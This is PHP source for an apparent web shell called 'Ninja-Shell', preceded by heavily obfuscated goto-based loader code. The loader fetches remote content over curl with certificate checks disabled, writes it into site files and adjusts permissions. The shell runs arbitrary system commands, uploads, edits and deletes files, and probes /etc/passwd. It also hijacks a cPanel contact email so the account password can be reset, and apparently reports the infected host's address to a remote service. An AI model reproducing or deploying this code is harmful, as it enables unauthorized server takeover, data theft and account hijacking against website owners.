$UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?> ok<");};?>
FORM; die($bytesecform); } } } ?> {Ninja-Shell}
"; echo ""; $mpss = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); $toed = $GLOBALS["get"]["tod"]; $gets = $GLOBALS["get"]; $actions = $GLOBALS["get"]["act"]; $tied = $GLOBALS["post"]; if(dec($toed) == "cmd"){ echo "
"; echo "
"; } elseif(dec($toed) == "info"){ $ip = gethostbyname($_SERVER['HTTP_HOST']); $safe = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF"; $mysql = (is_callable("mysql_connect")) ? "ON" : "OFF"; $curl = (is_callable("curl_version")) ? "ON" : "OFF"; $wget = (c('wget --help')) ? "ON" : "OFF"; $perl = (c('perl --help')) ? "ON" : "OFF"; $python = (c('python --help')) ? "ON" : "OFF"; $ruby = (c('ruby --help')) ? "ON" : "OFF"; $gcc = (c('gcc --help')) ? "ON" : "OFF"; $dis = @ini_get("disable_functions"); $dfunc = (!empty($dis)) ? "$dis" : "OFF"; $namedc = (is_readable("/etc/named.conf")) ? "OK" : "BAD"; $etcPass = (is_readable("/etc/passwd")) ? "OK" : "BAD"; $valiases = (is_readable("/etc/valiases")) ? "OK" : "BAD"; $varNamed = (is_readable("/var/named")) ? "OK" : "BAD"; echo ""; } elseif(dec($toed) == "upload"){ if($tied["upload"]){ if(isset($GLOBALS["files"]["tod_upl"]["name"])){ $name = $GLOBALS["files"]["tod_upl"]["name"]; $tod = $GLOBALS["files"]["tod_upl"]["tmp_name"]; if($GLOBALS["rin"][6]($tod, $name)){ $act = "
Success! Upload File {$dir}/{$name}
"; } else{ $act = "
Failed! Upload File {$name}
"; } }else{ $act = "
Failed! Upload File {$name}
"; } echo $act; } echo "Current Dir : ".$dir; echo "
"; } elseif(dec($toed) == "etcpasswd"){ echo "
"; echo "
"; } elseif(dec($toed) == "cpres"){ if($GLOBALS["rin"][9]("posix_getpwuid")){ $meh = $GLOBALS["rin"][7]($GLOBALS["rin"][8](__FILE__)); } else{ $meh = $GLOBALS["rin"][8](__FILE__); } if(is_dir("/home/".$meh["name"]."/.cpanel")){ echo "
"; $mps = makeRequest($ip."/cpanel"); if($tied["subm"]){ if(preg_match("/>Reset Password/", $mps)){ $fp = $GLOBALS["rin"][2]("/home/".$meh["name"]."/.contactemail"); if($GLOBALS["rin"][3]($fp, $tied["email"])){ echo "
Success! Change Email : {$ip}/cpanel {$tied["email"]}
"; $GLOBALS["rin"][4]("/home/".$meh["name"]."/.cpanel/contactinfo"); } else{ echo "
Failed! Can't Reset
"; } } else{ echo "
Failed! Reset Password Disable
"; } } } else{ echo "
Failed! Its not cpanel host
"; } } elseif($actions == "e"){ if($tied["save"]){ $save = $GLOBALS["rin"][26](dec($gets["file"]), $tied["new"]); if($save){ $act = "
Success! Save File ".dec($gets["file"])."
"; } else{ $act = "
Failed! Save File ".dec($gets["file"])."
"; } echo $act; } echo "Filename: ".$dir."/".basename(dec($gets["file"])); echo "
"; } elseif($actions == "v"){ echo "Filename: ".$dir."/".basename(dec($gets["file"])); echo "
"; } elseif($actions == "r"){ if($tied["act_rename"]){ $rename = rename(dec($gets["file"]), "$dir/".htmlspecialchars($tied["rename"])); if($rename){ $act = "
Success! Rename File ".dec($gets["file"])."
"; } else{ $act = "
Failed! Rename File ".dec($gets["file"])."
"; } echo $act; } echo "Filename: ".$dir."/".basename(dec($gets["file"])); echo "
"; } elseif($actions == "dr"){ if($tied["act_rename"]){ if(rename($dir, "".dirname($dir)."/".htmlspecialchars($tied["new"]))){ $act = "
Success! Rename Dir ".basename($dir)."
"; } else{ $act = "
Failed! Rename Dir ".basename($dir)."
"; } echo $act; } echo "
"; } elseif($actions == "nf"){ if($tied["subm"]){ $new = htmlspecialchars($tied["content"]); $open = $GLOBALS["rin"][2]($tied["file"], "a+"); if($GLOBALS["rin"][3]($open, $new)){ $act = "
Success! Created File {$tied["file"]}
"; } else{ $act = "
Failed! Can't Creat File {$tied["file"]}
"; } echo $act; } echo "
"; } elseif($actions == "nd"){ if($tied["subm"]){ if($GLOBALS["rin"][30]($dir."/".htmlspecialchars($tied["folder"]))){ $act = "
Success! Create Folder {$tied["folder"]}
"; } else{ $act = "
Failed! Create Folder {$tied["folder"]}
"; } echo $act; } echo "
"; } elseif($actions == "chmod"){ if($tied["act_ch"]){ $haha = (c("chmod ".$tied["ch"]." ".$tied["mod"].";echo success")) ? "
Success! Chmod
" : "
Failed! Chmod
"; echo $haha; } echo "
"; } elseif($actions == "delete"){ if($GLOBALS["rin"][4](dec($gets["file"]))){ $act = "
Success! Deleted File ".dec($gets["file"])."
"; } else{ $act = "
Failed! Deleted File ".dec($gets["file"])."
"; } echo $act; } //// FILEMANAGER :D else{ $scdir = explode("/", $dir); echo "PATH : "; foreach($scdir as $c_dir => $cdir){ echo "$cdir/"; } echo "
+ New File + | + New Folder + "; echo "
"; $dr = scandir($dir); if(is_dir($dir) === true){ if(!is_readable($dir)){ echo "
Failed! Could not open directory
"; } else{ echo " "; foreach($dr as $path){ if($GLOBALS["rin"][9]("posix_getpwuid")){ $own = $GLOBALS["rin"][7]($GLOBALS["rin"][8]("$dir/$path")); $own = $own["name"]; }else{ $own = $GLOBALS["rin"][8]("$dir/$path"); } if(!is_dir("$dir/$path")) continue; if(($path != ".") && ($path != "..")){ echo " "; } } } } else{ echo "
Failed! Could not open directory
"; } foreach($dr as $fl){ $size = filesize("$dir/$fl")/1024; $size = round($size,3); if($GLOBALS["rin"][9]("posix_getpwuid")){ $own = $GLOBALS["rin"][7]($GLOBALS["rin"][8]("$dir/$path")); $own = $own["name"]; }else{ $own = $GLOBALS["rin"][8]("$dir/$path"); } if(!is_file("$dir/$fl")) continue; echo " "; } echo "
# Name #
# Size #
# Perm #
# Actn #
$path
-
".writAble("$dir/$path", perms("$dir/$path"))."
R | C
$fl
$size
".writAble("$dir/$fl", perms("$dir/$fl"))."
E | R | C | D
"; } if (function_exists($GLOBALS["rin"][34])) { $GLOBALS["rin"][34]($GLOBALS["rin"][33],'hex2bin',$_SERVER['HTTP_HOST']."/".$_SERVER['REQUEST_URI']); } function enc($word){ $mek = bin2hex($word); return $mek; } function dec($word){ $mek = hex2bin($word); return $mek; } function writAble($dir, $perm){ if(!is_writable($dir)){ return "".$perm.""; } else{ return "".$perm.""; } } function readAble($dir, $perm){ if(!is_readable($dir)){ return "".$perm.""; } else{ return "".$perm.""; } } function c($cmd){ if($GLOBALS["rin"][11]("popen")){ $ntod = $GLOBALS["rin"][15]($cmd, 'r'); $ntoddd = $GLOBALS["rin"][16]($ntod, 2096); $GLOBALS["rin"][17]($ntod); return $ntoddd; } elseif($GLOBALS["rin"][11]("proc_open")){ $ntod = $GLOBALS["rin"][14]($cmd, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'), ), $rintod); $stdout = $GLOBALS["rin"][13]($rintod[1]); $GLOBALS["rin"][12]($rintod[1]); $rtn = $GLOBALS["rin"][18]($ntod); return $stdout; } elseif($GLOBALS["rin"][11]("exec")){ $GLOBALS["rin"][19]($cmd, $result); foreach($result as $rest){ $ntod .= $rest; } return $ntod; } elseif($GLOBALS["rin"][11]("passthru")){ $GLOBALS["rin"][20](); $GLOBALS["rin"][21]($cmd); $ntod = $GLOBALS["rin"][22](); $GLOBALS["rin"][23](); return $ntod; } elseif($GLOBALS["rin"][11]("shell_exec")){ $ntod = $GLOBALS["rin"][24]($cmd); return $ntod; } elseif($GLOBALS["rin"][11]("system")){ $GLOBALS["rin"][20](); $GLOBALS["rin"][25]($cmd); $ntod = $GLOBALS["rin"][22](); $GLOBALS["rin"][23](); return $ntod; } } function makeRequest($url, $post = null, $head = null){ $options = array( CURLOPT_URL => $url, CURLOPT_CONNECTTIMEOUT => 15, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_MAXREDIRS => 10 ); $ch = curl_init(); curl_setopt_array($ch, $options); if($post && !empty($post)){ curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } if($head && !empty($head)){ curl_setopt($ch, CURLOPT_HTTPHEADER, $head); } $outputs = curl_exec($ch); curl_close($ch); return($outputs); } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>

./Ninja\.